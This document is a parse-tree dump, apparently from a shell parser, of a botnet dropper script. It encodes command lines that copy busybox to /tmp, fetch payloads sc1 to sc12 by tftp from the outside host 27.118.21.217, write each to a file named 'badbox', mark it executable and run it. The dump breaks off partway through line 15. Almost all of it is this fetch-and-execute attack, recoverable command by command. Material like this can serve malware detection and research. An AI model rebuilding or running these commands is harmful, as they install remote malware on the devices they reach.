CommandNode(lineno=2, pos=(12, 26), parts=[
  WordNode(lineno=2, pos=(12, 18), word='ulimit'),
  WordNode(lineno=2, pos=(19, 21), word='-n'),
  WordNode(lineno=2, pos=(22, 26), word='1024'),
])
CommandNode(lineno=3, pos=(27, 48), parts=[
  WordNode(lineno=3, pos=(27, 29), word='cp'),
  WordNode(lineno=3, pos=(30, 42), word='/bin/busybox'),
  WordNode(lineno=3, pos=(43, 48), word='/tmp/'),
])
ListNode(lineno=4, pos=(49, 168), parts=[
  CommandNode(lineno=4, pos=(49, 56), parts=[
    WordNode(lineno=4, pos=(49, 51), word='cd'),
    WordNode(lineno=4, pos=(52, 56), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(57, 59)),
  CommandNode(lineno=4, pos=(60, 71), parts=[
    WordNode(lineno=4, pos=(60, 62), word='cd'),
    WordNode(lineno=4, pos=(63, 71), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(72, 74)),
  CommandNode(lineno=4, pos=(75, 82), parts=[
    WordNode(lineno=4, pos=(75, 77), word='cd'),
    WordNode(lineno=4, pos=(78, 82), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(83, 85)),
  CommandNode(lineno=4, pos=(86, 94), parts=[
    WordNode(lineno=4, pos=(86, 88), word='cd'),
    WordNode(lineno=4, pos=(89, 94), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(95, 97)),
  CommandNode(lineno=4, pos=(98, 102), parts=[
    WordNode(lineno=4, pos=(98, 100), word='cd'),
    WordNode(lineno=4, pos=(101, 102), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(102, 103)),
  CommandNode(lineno=4, pos=(104, 132), parts=[
    WordNode(lineno=4, pos=(104, 108), word='tftp'),
    WordNode(lineno=4, pos=(109, 111), word='-r'),
    WordNode(lineno=4, pos=(112, 115), word='sc1'),
    WordNode(lineno=4, pos=(116, 118), word='-g'),
    WordNode(lineno=4, pos=(119, 132), word='27.118.21.217'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(132, 133)),
  CommandNode(lineno=4, pos=(133, 148), parts=[
    WordNode(lineno=4, pos=(133, 136), word='cat'),
    WordNode(lineno=4, pos=(137, 140), word='sc1'),
    RedirectNode(lineno=4, output=
      WordNode(lineno=4, pos=(142, 148), word='badbox'), pos=(141, 148), type='>'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(148, 149)),
  CommandNode(lineno=4, pos=(149, 159), parts=[
    WordNode(lineno=4, pos=(149, 154), word='chmod'),
    WordNode(lineno=4, pos=(155, 157), word='+x'),
    WordNode(lineno=4, pos=(158, 159), word='*'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(159, 160)),
  CommandNode(lineno=4, pos=(160, 168), parts=[
    WordNode(lineno=4, pos=(160, 168), word='./badbox'),
  ]),
])
ListNode(lineno=5, pos=(169, 288), parts=[
  CommandNode(lineno=5, pos=(169, 176), parts=[
    WordNode(lineno=5, pos=(169, 171), word='cd'),
    WordNode(lineno=5, pos=(172, 176), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(177, 179)),
  CommandNode(lineno=5, pos=(180, 191), parts=[
    WordNode(lineno=5, pos=(180, 182), word='cd'),
    WordNode(lineno=5, pos=(183, 191), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(192, 194)),
  CommandNode(lineno=5, pos=(195, 202), parts=[
    WordNode(lineno=5, pos=(195, 197), word='cd'),
    WordNode(lineno=5, pos=(198, 202), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(203, 205)),
  CommandNode(lineno=5, pos=(206, 214), parts=[
    WordNode(lineno=5, pos=(206, 208), word='cd'),
    WordNode(lineno=5, pos=(209, 214), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(215, 217)),
  CommandNode(lineno=5, pos=(218, 222), parts=[
    WordNode(lineno=5, pos=(218, 220), word='cd'),
    WordNode(lineno=5, pos=(221, 222), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(222, 223)),
  CommandNode(lineno=5, pos=(224, 252), parts=[
    WordNode(lineno=5, pos=(224, 228), word='tftp'),
    WordNode(lineno=5, pos=(229, 231), word='-r'),
    WordNode(lineno=5, pos=(232, 235), word='sc2'),
    WordNode(lineno=5, pos=(236, 238), word='-g'),
    WordNode(lineno=5, pos=(239, 252), word='27.118.21.217'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(252, 253)),
  CommandNode(lineno=5, pos=(253, 268), parts=[
    WordNode(lineno=5, pos=(253, 256), word='cat'),
    WordNode(lineno=5, pos=(257, 260), word='sc2'),
    RedirectNode(lineno=5, output=
      WordNode(lineno=5, pos=(262, 268), word='badbox'), pos=(261, 268), type='>'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(268, 269)),
  CommandNode(lineno=5, pos=(269, 279), parts=[
    WordNode(lineno=5, pos=(269, 274), word='chmod'),
    WordNode(lineno=5, pos=(275, 277), word='+x'),
    WordNode(lineno=5, pos=(278, 279), word='*'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(279, 280)),
  CommandNode(lineno=5, pos=(280, 288), parts=[
    WordNode(lineno=5, pos=(280, 288), word='./badbox'),
  ]),
])
ListNode(lineno=6, pos=(289, 408), parts=[
  CommandNode(lineno=6, pos=(289, 296), parts=[
    WordNode(lineno=6, pos=(289, 291), word='cd'),
    WordNode(lineno=6, pos=(292, 296), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(297, 299)),
  CommandNode(lineno=6, pos=(300, 311), parts=[
    WordNode(lineno=6, pos=(300, 302), word='cd'),
    WordNode(lineno=6, pos=(303, 311), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(312, 314)),
  CommandNode(lineno=6, pos=(315, 322), parts=[
    WordNode(lineno=6, pos=(315, 317), word='cd'),
    WordNode(lineno=6, pos=(318, 322), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(323, 325)),
  CommandNode(lineno=6, pos=(326, 334), parts=[
    WordNode(lineno=6, pos=(326, 328), word='cd'),
    WordNode(lineno=6, pos=(329, 334), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(335, 337)),
  CommandNode(lineno=6, pos=(338, 342), parts=[
    WordNode(lineno=6, pos=(338, 340), word='cd'),
    WordNode(lineno=6, pos=(341, 342), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(342, 343)),
  CommandNode(lineno=6, pos=(344, 372), parts=[
    WordNode(lineno=6, pos=(344, 348), word='tftp'),
    WordNode(lineno=6, pos=(349, 351), word='-r'),
    WordNode(lineno=6, pos=(352, 355), word='sc3'),
    WordNode(lineno=6, pos=(356, 358), word='-g'),
    WordNode(lineno=6, pos=(359, 372), word='27.118.21.217'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(372, 373)),
  CommandNode(lineno=6, pos=(373, 388), parts=[
    WordNode(lineno=6, pos=(373, 376), word='cat'),
    WordNode(lineno=6, pos=(377, 380), word='sc3'),
    RedirectNode(lineno=6, output=
      WordNode(lineno=6, pos=(382, 388), word='badbox'), pos=(381, 388), type='>'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(388, 389)),
  CommandNode(lineno=6, pos=(389, 399), parts=[
    WordNode(lineno=6, pos=(389, 394), word='chmod'),
    WordNode(lineno=6, pos=(395, 397), word='+x'),
    WordNode(lineno=6, pos=(398, 399), word='*'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(399, 400)),
  CommandNode(lineno=6, pos=(400, 408), parts=[
    WordNode(lineno=6, pos=(400, 408), word='./badbox'),
  ]),
])
ListNode(lineno=7, pos=(409, 528), parts=[
  CommandNode(lineno=7, pos=(409, 416), parts=[
    WordNode(lineno=7, pos=(409, 411), word='cd'),
    WordNode(lineno=7, pos=(412, 416), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(417, 419)),
  CommandNode(lineno=7, pos=(420, 431), parts=[
    WordNode(lineno=7, pos=(420, 422), word='cd'),
    WordNode(lineno=7, pos=(423, 431), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(432, 434)),
  CommandNode(lineno=7, pos=(435, 442), parts=[
    WordNode(lineno=7, pos=(435, 437), word='cd'),
    WordNode(lineno=7, pos=(438, 442), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(443, 445)),
  CommandNode(lineno=7, pos=(446, 454), parts=[
    WordNode(lineno=7, pos=(446, 448), word='cd'),
    WordNode(lineno=7, pos=(449, 454), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(455, 457)),
  CommandNode(lineno=7, pos=(458, 462), parts=[
    WordNode(lineno=7, pos=(458, 460), word='cd'),
    WordNode(lineno=7, pos=(461, 462), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(462, 463)),
  CommandNode(lineno=7, pos=(464, 492), parts=[
    WordNode(lineno=7, pos=(464, 468), word='tftp'),
    WordNode(lineno=7, pos=(469, 471), word='-r'),
    WordNode(lineno=7, pos=(472, 475), word='sc4'),
    WordNode(lineno=7, pos=(476, 478), word='-g'),
    WordNode(lineno=7, pos=(479, 492), word='27.118.21.217'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(492, 493)),
  CommandNode(lineno=7, pos=(493, 508), parts=[
    WordNode(lineno=7, pos=(493, 496), word='cat'),
    WordNode(lineno=7, pos=(497, 500), word='sc4'),
    RedirectNode(lineno=7, output=
      WordNode(lineno=7, pos=(502, 508), word='badbox'), pos=(501, 508), type='>'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(508, 509)),
  CommandNode(lineno=7, pos=(509, 519), parts=[
    WordNode(lineno=7, pos=(509, 514), word='chmod'),
    WordNode(lineno=7, pos=(515, 517), word='+x'),
    WordNode(lineno=7, pos=(518, 519), word='*'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(519, 520)),
  CommandNode(lineno=7, pos=(520, 528), parts=[
    WordNode(lineno=7, pos=(520, 528), word='./badbox'),
  ]),
])
ListNode(lineno=8, pos=(529, 648), parts=[
  CommandNode(lineno=8, pos=(529, 536), parts=[
    WordNode(lineno=8, pos=(529, 531), word='cd'),
    WordNode(lineno=8, pos=(532, 536), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(537, 539)),
  CommandNode(lineno=8, pos=(540, 551), parts=[
    WordNode(lineno=8, pos=(540, 542), word='cd'),
    WordNode(lineno=8, pos=(543, 551), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(552, 554)),
  CommandNode(lineno=8, pos=(555, 562), parts=[
    WordNode(lineno=8, pos=(555, 557), word='cd'),
    WordNode(lineno=8, pos=(558, 562), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(563, 565)),
  CommandNode(lineno=8, pos=(566, 574), parts=[
    WordNode(lineno=8, pos=(566, 568), word='cd'),
    WordNode(lineno=8, pos=(569, 574), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(575, 577)),
  CommandNode(lineno=8, pos=(578, 582), parts=[
    WordNode(lineno=8, pos=(578, 580), word='cd'),
    WordNode(lineno=8, pos=(581, 582), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(582, 583)),
  CommandNode(lineno=8, pos=(584, 612), parts=[
    WordNode(lineno=8, pos=(584, 588), word='tftp'),
    WordNode(lineno=8, pos=(589, 591), word='-r'),
    WordNode(lineno=8, pos=(592, 595), word='sc5'),
    WordNode(lineno=8, pos=(596, 598), word='-g'),
    WordNode(lineno=8, pos=(599, 612), word='27.118.21.217'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(612, 613)),
  CommandNode(lineno=8, pos=(613, 628), parts=[
    WordNode(lineno=8, pos=(613, 616), word='cat'),
    WordNode(lineno=8, pos=(617, 620), word='sc5'),
    RedirectNode(lineno=8, output=
      WordNode(lineno=8, pos=(622, 628), word='badbox'), pos=(621, 628), type='>'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(628, 629)),
  CommandNode(lineno=8, pos=(629, 639), parts=[
    WordNode(lineno=8, pos=(629, 634), word='chmod'),
    WordNode(lineno=8, pos=(635, 637), word='+x'),
    WordNode(lineno=8, pos=(638, 639), word='*'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(639, 640)),
  CommandNode(lineno=8, pos=(640, 648), parts=[
    WordNode(lineno=8, pos=(640, 648), word='./badbox'),
  ]),
])
ListNode(lineno=9, pos=(649, 768), parts=[
  CommandNode(lineno=9, pos=(649, 656), parts=[
    WordNode(lineno=9, pos=(649, 651), word='cd'),
    WordNode(lineno=9, pos=(652, 656), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(657, 659)),
  CommandNode(lineno=9, pos=(660, 671), parts=[
    WordNode(lineno=9, pos=(660, 662), word='cd'),
    WordNode(lineno=9, pos=(663, 671), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(672, 674)),
  CommandNode(lineno=9, pos=(675, 682), parts=[
    WordNode(lineno=9, pos=(675, 677), word='cd'),
    WordNode(lineno=9, pos=(678, 682), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(683, 685)),
  CommandNode(lineno=9, pos=(686, 694), parts=[
    WordNode(lineno=9, pos=(686, 688), word='cd'),
    WordNode(lineno=9, pos=(689, 694), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(695, 697)),
  CommandNode(lineno=9, pos=(698, 702), parts=[
    WordNode(lineno=9, pos=(698, 700), word='cd'),
    WordNode(lineno=9, pos=(701, 702), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(702, 703)),
  CommandNode(lineno=9, pos=(704, 732), parts=[
    WordNode(lineno=9, pos=(704, 708), word='tftp'),
    WordNode(lineno=9, pos=(709, 711), word='-r'),
    WordNode(lineno=9, pos=(712, 715), word='sc6'),
    WordNode(lineno=9, pos=(716, 718), word='-g'),
    WordNode(lineno=9, pos=(719, 732), word='27.118.21.217'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(732, 733)),
  CommandNode(lineno=9, pos=(733, 748), parts=[
    WordNode(lineno=9, pos=(733, 736), word='cat'),
    WordNode(lineno=9, pos=(737, 740), word='sc6'),
    RedirectNode(lineno=9, output=
      WordNode(lineno=9, pos=(742, 748), word='badbox'), pos=(741, 748), type='>'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(748, 749)),
  CommandNode(lineno=9, pos=(749, 759), parts=[
    WordNode(lineno=9, pos=(749, 754), word='chmod'),
    WordNode(lineno=9, pos=(755, 757), word='+x'),
    WordNode(lineno=9, pos=(758, 759), word='*'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(759, 760)),
  CommandNode(lineno=9, pos=(760, 768), parts=[
    WordNode(lineno=9, pos=(760, 768), word='./badbox'),
  ]),
])
ListNode(lineno=10, pos=(769, 888), parts=[
  CommandNode(lineno=10, pos=(769, 776), parts=[
    WordNode(lineno=10, pos=(769, 771), word='cd'),
    WordNode(lineno=10, pos=(772, 776), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(777, 779)),
  CommandNode(lineno=10, pos=(780, 791), parts=[
    WordNode(lineno=10, pos=(780, 782), word='cd'),
    WordNode(lineno=10, pos=(783, 791), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(792, 794)),
  CommandNode(lineno=10, pos=(795, 802), parts=[
    WordNode(lineno=10, pos=(795, 797), word='cd'),
    WordNode(lineno=10, pos=(798, 802), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(803, 805)),
  CommandNode(lineno=10, pos=(806, 814), parts=[
    WordNode(lineno=10, pos=(806, 808), word='cd'),
    WordNode(lineno=10, pos=(809, 814), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(815, 817)),
  CommandNode(lineno=10, pos=(818, 822), parts=[
    WordNode(lineno=10, pos=(818, 820), word='cd'),
    WordNode(lineno=10, pos=(821, 822), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(822, 823)),
  CommandNode(lineno=10, pos=(824, 852), parts=[
    WordNode(lineno=10, pos=(824, 828), word='tftp'),
    WordNode(lineno=10, pos=(829, 831), word='-r'),
    WordNode(lineno=10, pos=(832, 835), word='sc7'),
    WordNode(lineno=10, pos=(836, 838), word='-g'),
    WordNode(lineno=10, pos=(839, 852), word='27.118.21.217'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(852, 853)),
  CommandNode(lineno=10, pos=(853, 868), parts=[
    WordNode(lineno=10, pos=(853, 856), word='cat'),
    WordNode(lineno=10, pos=(857, 860), word='sc7'),
    RedirectNode(lineno=10, output=
      WordNode(lineno=10, pos=(862, 868), word='badbox'), pos=(861, 868), type='>'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(868, 869)),
  CommandNode(lineno=10, pos=(869, 879), parts=[
    WordNode(lineno=10, pos=(869, 874), word='chmod'),
    WordNode(lineno=10, pos=(875, 877), word='+x'),
    WordNode(lineno=10, pos=(878, 879), word='*'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(879, 880)),
  CommandNode(lineno=10, pos=(880, 888), parts=[
    WordNode(lineno=10, pos=(880, 888), word='./badbox'),
  ]),
])
ListNode(lineno=11, pos=(889, 1008), parts=[
  CommandNode(lineno=11, pos=(889, 896), parts=[
    WordNode(lineno=11, pos=(889, 891), word='cd'),
    WordNode(lineno=11, pos=(892, 896), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(897, 899)),
  CommandNode(lineno=11, pos=(900, 911), parts=[
    WordNode(lineno=11, pos=(900, 902), word='cd'),
    WordNode(lineno=11, pos=(903, 911), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(912, 914)),
  CommandNode(lineno=11, pos=(915, 922), parts=[
    WordNode(lineno=11, pos=(915, 917), word='cd'),
    WordNode(lineno=11, pos=(918, 922), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(923, 925)),
  CommandNode(lineno=11, pos=(926, 934), parts=[
    WordNode(lineno=11, pos=(926, 928), word='cd'),
    WordNode(lineno=11, pos=(929, 934), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(935, 937)),
  CommandNode(lineno=11, pos=(938, 942), parts=[
    WordNode(lineno=11, pos=(938, 940), word='cd'),
    WordNode(lineno=11, pos=(941, 942), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(942, 943)),
  CommandNode(lineno=11, pos=(944, 972), parts=[
    WordNode(lineno=11, pos=(944, 948), word='tftp'),
    WordNode(lineno=11, pos=(949, 951), word='-r'),
    WordNode(lineno=11, pos=(952, 955), word='sc8'),
    WordNode(lineno=11, pos=(956, 958), word='-g'),
    WordNode(lineno=11, pos=(959, 972), word='27.118.21.217'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(972, 973)),
  CommandNode(lineno=11, pos=(973, 988), parts=[
    WordNode(lineno=11, pos=(973, 976), word='cat'),
    WordNode(lineno=11, pos=(977, 980), word='sc8'),
    RedirectNode(lineno=11, output=
      WordNode(lineno=11, pos=(982, 988), word='badbox'), pos=(981, 988), type='>'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(988, 989)),
  CommandNode(lineno=11, pos=(989, 999), parts=[
    WordNode(lineno=11, pos=(989, 994), word='chmod'),
    WordNode(lineno=11, pos=(995, 997), word='+x'),
    WordNode(lineno=11, pos=(998, 999), word='*'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(999, 1000)),
  CommandNode(lineno=11, pos=(1000, 1008), parts=[
    WordNode(lineno=11, pos=(1000, 1008), word='./badbox'),
  ]),
])
ListNode(lineno=12, pos=(1009, 1128), parts=[
  CommandNode(lineno=12, pos=(1009, 1016), parts=[
    WordNode(lineno=12, pos=(1009, 1011), word='cd'),
    WordNode(lineno=12, pos=(1012, 1016), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1017, 1019)),
  CommandNode(lineno=12, pos=(1020, 1031), parts=[
    WordNode(lineno=12, pos=(1020, 1022), word='cd'),
    WordNode(lineno=12, pos=(1023, 1031), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1032, 1034)),
  CommandNode(lineno=12, pos=(1035, 1042), parts=[
    WordNode(lineno=12, pos=(1035, 1037), word='cd'),
    WordNode(lineno=12, pos=(1038, 1042), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1043, 1045)),
  CommandNode(lineno=12, pos=(1046, 1054), parts=[
    WordNode(lineno=12, pos=(1046, 1048), word='cd'),
    WordNode(lineno=12, pos=(1049, 1054), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1055, 1057)),
  CommandNode(lineno=12, pos=(1058, 1062), parts=[
    WordNode(lineno=12, pos=(1058, 1060), word='cd'),
    WordNode(lineno=12, pos=(1061, 1062), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1062, 1063)),
  CommandNode(lineno=12, pos=(1064, 1092), parts=[
    WordNode(lineno=12, pos=(1064, 1068), word='tftp'),
    WordNode(lineno=12, pos=(1069, 1071), word='-r'),
    WordNode(lineno=12, pos=(1072, 1075), word='sc9'),
    WordNode(lineno=12, pos=(1076, 1078), word='-g'),
    WordNode(lineno=12, pos=(1079, 1092), word='27.118.21.217'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1092, 1093)),
  CommandNode(lineno=12, pos=(1093, 1108), parts=[
    WordNode(lineno=12, pos=(1093, 1096), word='cat'),
    WordNode(lineno=12, pos=(1097, 1100), word='sc9'),
    RedirectNode(lineno=12, output=
      WordNode(lineno=12, pos=(1102, 1108), word='badbox'), pos=(1101, 1108), type='>'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1108, 1109)),
  CommandNode(lineno=12, pos=(1109, 1119), parts=[
    WordNode(lineno=12, pos=(1109, 1114), word='chmod'),
    WordNode(lineno=12, pos=(1115, 1117), word='+x'),
    WordNode(lineno=12, pos=(1118, 1119), word='*'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1119, 1120)),
  CommandNode(lineno=12, pos=(1120, 1128), parts=[
    WordNode(lineno=12, pos=(1120, 1128), word='./badbox'),
  ]),
])
ListNode(lineno=13, pos=(1129, 1250), parts=[
  CommandNode(lineno=13, pos=(1129, 1136), parts=[
    WordNode(lineno=13, pos=(1129, 1131), word='cd'),
    WordNode(lineno=13, pos=(1132, 1136), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1137, 1139)),
  CommandNode(lineno=13, pos=(1140, 1151), parts=[
    WordNode(lineno=13, pos=(1140, 1142), word='cd'),
    WordNode(lineno=13, pos=(1143, 1151), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1152, 1154)),
  CommandNode(lineno=13, pos=(1155, 1162), parts=[
    WordNode(lineno=13, pos=(1155, 1157), word='cd'),
    WordNode(lineno=13, pos=(1158, 1162), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1163, 1165)),
  CommandNode(lineno=13, pos=(1166, 1174), parts=[
    WordNode(lineno=13, pos=(1166, 1168), word='cd'),
    WordNode(lineno=13, pos=(1169, 1174), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1175, 1177)),
  CommandNode(lineno=13, pos=(1178, 1182), parts=[
    WordNode(lineno=13, pos=(1178, 1180), word='cd'),
    WordNode(lineno=13, pos=(1181, 1182), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1182, 1183)),
  CommandNode(lineno=13, pos=(1184, 1213), parts=[
    WordNode(lineno=13, pos=(1184, 1188), word='tftp'),
    WordNode(lineno=13, pos=(1189, 1191), word='-r'),
    WordNode(lineno=13, pos=(1192, 1196), word='sc10'),
    WordNode(lineno=13, pos=(1197, 1199), word='-g'),
    WordNode(lineno=13, pos=(1200, 1213), word='27.118.21.217'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1213, 1214)),
  CommandNode(lineno=13, pos=(1214, 1230), parts=[
    WordNode(lineno=13, pos=(1214, 1217), word='cat'),
    WordNode(lineno=13, pos=(1218, 1222), word='sc10'),
    RedirectNode(lineno=13, output=
      WordNode(lineno=13, pos=(1224, 1230), word='badbox'), pos=(1223, 1230), type='>'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1230, 1231)),
  CommandNode(lineno=13, pos=(1231, 1241), parts=[
    WordNode(lineno=13, pos=(1231, 1236), word='chmod'),
    WordNode(lineno=13, pos=(1237, 1239), word='+x'),
    WordNode(lineno=13, pos=(1240, 1241), word='*'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1241, 1242)),
  CommandNode(lineno=13, pos=(1242, 1250), parts=[
    WordNode(lineno=13, pos=(1242, 1250), word='./badbox'),
  ]),
])
ListNode(lineno=14, pos=(1251, 1372), parts=[
  CommandNode(lineno=14, pos=(1251, 1258), parts=[
    WordNode(lineno=14, pos=(1251, 1253), word='cd'),
    WordNode(lineno=14, pos=(1254, 1258), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1259, 1261)),
  CommandNode(lineno=14, pos=(1262, 1273), parts=[
    WordNode(lineno=14, pos=(1262, 1264), word='cd'),
    WordNode(lineno=14, pos=(1265, 1273), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1274, 1276)),
  CommandNode(lineno=14, pos=(1277, 1284), parts=[
    WordNode(lineno=14, pos=(1277, 1279), word='cd'),
    WordNode(lineno=14, pos=(1280, 1284), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1285, 1287)),
  CommandNode(lineno=14, pos=(1288, 1296), parts=[
    WordNode(lineno=14, pos=(1288, 1290), word='cd'),
    WordNode(lineno=14, pos=(1291, 1296), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1297, 1299)),
  CommandNode(lineno=14, pos=(1300, 1304), parts=[
    WordNode(lineno=14, pos=(1300, 1302), word='cd'),
    WordNode(lineno=14, pos=(1303, 1304), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1304, 1305)),
  CommandNode(lineno=14, pos=(1306, 1335), parts=[
    WordNode(lineno=14, pos=(1306, 1310), word='tftp'),
    WordNode(lineno=14, pos=(1311, 1313), word='-r'),
    WordNode(lineno=14, pos=(1314, 1318), word='sc11'),
    WordNode(lineno=14, pos=(1319, 1321), word='-g'),
    WordNode(lineno=14, pos=(1322, 1335), word='27.118.21.217'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1335, 1336)),
  CommandNode(lineno=14, pos=(1336, 1352), parts=[
    WordNode(lineno=14, pos=(1336, 1339), word='cat'),
    WordNode(lineno=14, pos=(1340, 1344), word='sc11'),
    RedirectNode(lineno=14, output=
      WordNode(lineno=14, pos=(1346, 1352), word='badbox'), pos=(1345, 1352), type='>'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1352, 1353)),
  CommandNode(lineno=14, pos=(1353, 1363), parts=[
    WordNode(lineno=14, pos=(1353, 1358), word='chmod'),
    WordNode(lineno=14, pos=(1359, 1361), word='+x'),
    WordNode(lineno=14, pos=(1362, 1363), word='*'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1363, 1364)),
  CommandNode(lineno=14, pos=(1364, 1372), parts=[
    WordNode(lineno=14, pos=(1364, 1372), word='./badbox'),
  ]),
])
ListNode(lineno=15, pos=(1373, 1494), parts=[
  CommandNode(lineno=15, pos=(1373, 1380), parts=[
    WordNode(lineno=15, pos=(1373, 1375), word='cd'),
    WordNode(lineno=15, pos=(1376, 1380), word='/tmp'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1381, 1383)),
  CommandNode(lineno=15, pos=(1384, 1395), parts=[
    WordNode(lineno=15, pos=(1384, 1386), word='cd'),
    WordNode(lineno=15, pos=(1387, 1395), word='/var/run'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1396, 1398)),
  CommandNode(lineno=15, pos=(1399, 1406), parts=[
    WordNode(lineno=15, pos=(1399, 1401), word='cd'),
    WordNode(lineno=15, pos=(1402, 1406), word='/mnt'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1407, 1409)),
  CommandNode(lineno=15, pos=(1410, 1418), parts=[
    WordNode(lineno=15, pos=(1410, 1412), word='cd'),
    WordNode(lineno=15, pos=(1413, 1418), word='/root'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1419, 1421)),
  CommandNode(lineno=15, pos=(1422, 1426), parts=[
    WordNode(lineno=15, pos=(1422, 1424), word='cd'),
    WordNode(lineno=15, pos=(1425, 1426), word='/'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1426, 1427)),
  CommandNode(lineno=15, pos=(1428, 1457), parts=[
    WordNode(lineno=15, pos=(1428, 1432), word='tftp'),
    WordNode(lineno=15, pos=(1433, 1435), word='-r'),
    WordNode(lineno=15, pos=(1436, 1440), word='sc12'),
    WordNode(lineno=15, pos=(1441, 1443), word='-g'),
    WordNode(lineno=15, pos=(1444, 1457), word='27.118.21.217'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1457, 1458)),
  CommandNode(lineno=15, pos=(1458, 1474), parts=[
    WordNode(lineno=15, pos=(1458, 1461), word='cat'),
    WordNode(lineno=15, pos=(1462, 1466), word='sc12'),
    RedirectNode(lineno=15, output=
      WordNode(lineno=15, pos=(1468, 1474), word='badbox'), pos=(1467, 1474), type='>'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1474, 1475)),
  CommandNode(lineno=15, pos=(1475, 1485), parts=[
    WordNode(lineno=15, pos=(1475, 1480), word='chmod'),
    WordNode(lineno=15, pos=(1481, 1483), word='+x'),
    WordNode(lineno=15, pos=(1484, 1485), word='*'),
  ]),
